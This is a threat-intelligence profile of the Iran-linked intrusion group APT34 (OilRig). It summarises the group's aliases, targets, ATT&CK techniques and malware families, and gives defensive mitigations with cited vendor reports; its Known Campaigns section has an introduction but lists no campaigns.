APT34 / OilRig

Overview

APT34, commonly called OilRig, is a suspected Iranian state-aligned intrusion set tracked in MITRE ATT&CK as G0049. Public reporting places the group in sustained operation since at least 2014, with targeting concentrated in the Middle East but not limited to that region. Organizations in government, financial services, telecommunications, chemical, energy, and technology supply chains have all appeared in publicly documented activity.

Multiple vendors map overlapping activity to names including Helix Kitten, COBALT GYPSY, Evasive Serpens, EUROPIUM, and more recently Hazel Sandstorm or Earth Simnavaz. The naming overlap is imperfect across vendors, but the common profile is stable: long-duration espionage operations, extensive use of stolen credentials, phishing and attachment-based delivery, PowerShell and .NET malware, Exchange-centric credential theft, IIS abuse, and iterative retooling rather than one fixed malware family.

OilRig has historically paired custom malware with pragmatic operator tradecraft. Reporting from Unit 42 and Mandiant shows repeated reliance on compromised mailboxes, malicious macro documents, RTF exploit chains, PowerShell loaders, and credential harvesting to pivot through trusted entities toward higher-value downstream targets. More recent research from Trend Micro indicates the cluster remains active through 2024 and continues to evolve with new Exchange-oriented credential theft tooling and privilege-escalation exploitation.

Target Profile

OilRig's victimology strongly aligns with intelligence collection and access development in geopolitically sensitive environments. The group tends to prefer organizations that either hold strategic data directly or can be used as intermediaries to reach those primary targets.

• Government and public-sector entities: Ministries, agencies, and administrative bodies in the Middle East have been recurrent targets for diplomatic, political, and strategic intelligence collection.
• Energy, oil, gas, and critical infrastructure: Campaign reporting repeatedly places OilRig against oil and gas organizations, utilities, and infrastructure-linked entities, reflecting Iran-linked strategic collection priorities.
• Financial services and telecommunications: Banks, telecom providers, and adjacent service organizations have been targeted for both intelligence value and their position in trusted communications or transaction ecosystems.
• Technology service providers and supply-chain intermediaries: OilRig has shown interest in leveraging trusted third parties, including service providers and compromised government-linked accounts, to stage or relay attacks into intended end targets.

Tactics, Techniques & Procedures

Observed tradecraft blends phishing-led initial access, living-off-the-land execution, credential theft, web and DNS-based command and control, and persistence mechanisms adapted to Windows enterprise environments. The rows below summarize representative ATT&CK techniques repeatedly tied to OilRig public reporting.

mitre id	technique	description
T1566.001	Spearphishing Attachment	Repeatedly delivers malicious Office, RTF, and macro-enabled lure documents to targeted users; several campaigns used compromised accounts to improve trust and delivery success.
T1059.001	PowerShell	Uses PowerShell extensively for downloaders, backdoors, stagers, discovery, and execution. Families such as BONDUPDATER and PowerExchange reflect the group's long-running PowerShell emphasis.
T1555	Credentials from Password Stores	Public reporting and ATT&CK procedure examples tie OilRig to credential theft from locally logged-in accounts and Outlook Web Access-related access collection using tools such as LaZagne.
T1556.002	Password Filter DLL	OilRig has been observed registering malicious password filter DLLs to capture credentials during authentication, a higher-end persistence and collection mechanism seen again in later reporting.
T1071.004	DNS	Several OilRig-associated backdoors and related reporting describe DNS-based command-and-control or tunneling behavior designed to blend into expected enterprise traffic and evade simplistic filtering.
T1204.002	User Execution: Malicious File	The group routinely depends on victims opening lure documents or executables that trigger follow-on PowerShell or .NET payload execution after social engineering succeeds.

Known Campaigns

Public reporting attributes multiple intrusion clusters and campaign families to OilRig. Not every vendor uses identical naming, but the operations below are widely discussed and technically linked to the group's broader activity.

Tools & Malware

OilRig's malware ecosystem is broad and iterative. The group frequently reuses architectural patterns while changing payload names, packaging, or transport methods.

• BONDUPDATER: PowerShell backdoor tied to OilRig, first observed in 2017 against a Middle Eastern government target and later seen in updated spearphishing operations.
• Helminth: Backdoor family delivered through macro-enabled Excel documents and other formats; an early example of the group's preference for scripting-heavy intrusion chains.
• QUADAGENT: PowerShell-based backdoor packaged into PE delivery chains, including bat2exe and .NET-wrapped variants, used in 2018 campaigns against government and technology-linked organizations.
• OopsIE: Trojan family that evolved to include anti-analysis and anti-virtualization checks while preserving the group's lure-and-execute workflow.
• Mango: C#/.NET first-stage backdoor used in the Juicy Mix campaign and described by MITRE as a successor to Solar with improved exfiltration and evasion behavior.
• PowerExchange: PowerShell backdoor used since at least 2023 against Middle Eastern government targets, reinforcing that PowerShell remains central to OilRig tradecraft.
• ISMInjector / ISMAgent: Installer and follow-on backdoor combination used for persistence and credential-focused post-compromise activity.

Mitigation & Defense

Defensive priorities should focus on reducing phishing success, constraining script execution, hardening identity infrastructure, and aggressively monitoring Exchange, IIS, and privileged authentication paths.

• Harden identity infrastructure: Monitor for password filter DLL registration, LSASS and Exchange credential access attempts, suspicious mailbox rule creation, and unusual authentication flows from trusted internal accounts.
• Constrain PowerShell and script abuse: Enforce Constrained Language Mode where feasible, centralize Script Block Logging and AMSI telemetry, alert on encoded commands, and baseline legitimate administrative script usage.
• Prioritize phishing-resistant controls: Require phishing-resistant MFA for remote and administrative access, restrict macro execution from internet-sourced documents, and sandbox document attachments and RTF/Office exploit chains.
• Patch rapidly for edge and privilege-escalation exposure: OilRig-aligned activity has repeatedly incorporated newly useful vulnerabilities; prioritize internet-facing applications, Exchange, VPN, and Windows local privilege-escalation fixes.
• Inspect trusted-path pivots: Monitor for anomalous email sending from partner or government-linked accounts, unexpected service-provider remote access, and suspicious activity originating from legitimate but atypical third-party relationships.
• Instrument IIS, DNS, and webshell detection: Review IIS worker process behavior, new ASPX or dropped web content, anomalous DNS query structures, and covert C2 patterns hidden in HTTP/DNS traffic.

Sources & Further Reading

Attribution and references used to build this profile.

• MITRE ATT&CK — OilRig (G0049)
• Mandiant / Google Cloud — New Targeted Attack in the Middle East by APT34
• Mandiant / Google Cloud — Hard Pass: Declining APT34's Invite to Join Their Professional Network
• Unit 42 — OilRig Targets Technology Service Provider and Government Agency with QUADAGENT
• Unit 42 — OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE
• Unit 42 — Behind the Scenes with OilRig
• Trend Micro — Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against Middle East
• MITRE ATT&CK — Juicy Mix (C0044)